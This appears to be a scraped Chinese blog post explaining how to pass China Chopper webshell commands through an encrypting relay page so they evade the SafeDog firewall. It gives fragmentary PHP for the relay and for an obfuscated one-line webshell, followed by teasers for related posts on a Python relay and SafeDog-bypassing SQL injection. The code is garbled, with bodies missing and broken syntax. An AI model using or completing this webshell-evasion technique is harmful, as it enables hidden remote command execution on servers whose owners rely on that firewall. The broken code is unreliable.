前言
聽說中國菜刀裡有後門。抓包我是沒有監測到異常資料報。為了以防萬一,且更好使用中國菜刀硬槓安全狗。筆者收集了一下資料。無恥的copy大佬的原始碼,只是在大佬的基礎上簡單修改了一下,達到webshell繞過安全狗。
原理
菜刀不直接向shell傳送資料,而是傳送到中轉的乙個頁面上,這個頁面對接收的引數全部進行加密,然後再傳送給shell,shell接收後用同樣的演算法進行解密,執行命令。
本地127.0.0.1,安裝phpstudy
transfer.php
<?phpfunction encode($str)
// webshell位址,transserv.php為定製一句話
$webshell = '';
$pdata = $_post;//接受所有post資料,陣列
//var_dump($pdata);
foreach($pdata as $key=>$value)
// 菜刀密碼
if($key == 'x')
}$data = http_build_query($pdata);//模擬http請求的,把得到的資料data通過函式url-encode請求
//var_dump($data);//str字串
//模擬post、get請求,建立資源流上下文,資料報
$html = @file_get_contents($webshell, false, $context);
echo $html;
?>
服務端transserv.php
<?php$ds = @$/*-*/['x'];
//echo $ds;
if (!empty($ds) )
中轉Webshell 繞過安全狗(一)
前言 聽說中國菜刀裡有後門。抓包我是沒有監測到異常資料報。為了以防萬一,且更好使用中國菜刀硬槓安全狗。筆者收集了一下資料。無恥的copy大佬的原始碼,只是在大佬的基礎上簡單修改了一下,達到webshell繞過安全狗。原理 菜刀不直接向shell傳送資料,而是傳送到中轉的乙個頁面上,這個頁面對接收的引...
中轉Webshell 繞過安全狗(二)
前言 在實踐中轉webshell繞過安全狗 一 中,在服務端和客戶端均為php。某大佬提示並分享資源後,打算使用python完成中轉。部分 無恥copy。本地127.0.0.1,安裝python2 phpshellproxy.py coding utf 8 import sys reload sys...
繞安全狗mysql Mysql注入繞過安全狗
mysql注入繞過安全狗 sql注入閉合檢查 sql注入的分類有很多種分法 可以分成數字型和字元型,區別在於是否需要完整閉合。本題中由於我經驗不足,試了好久才想到就是簡單的雙引號加括號就可以閉合了,然後再注釋掉後面的內容。單引號 回顯正常結果 雙引號錯誤回顯 這裡其實可以簡單分析一下,1 是get請...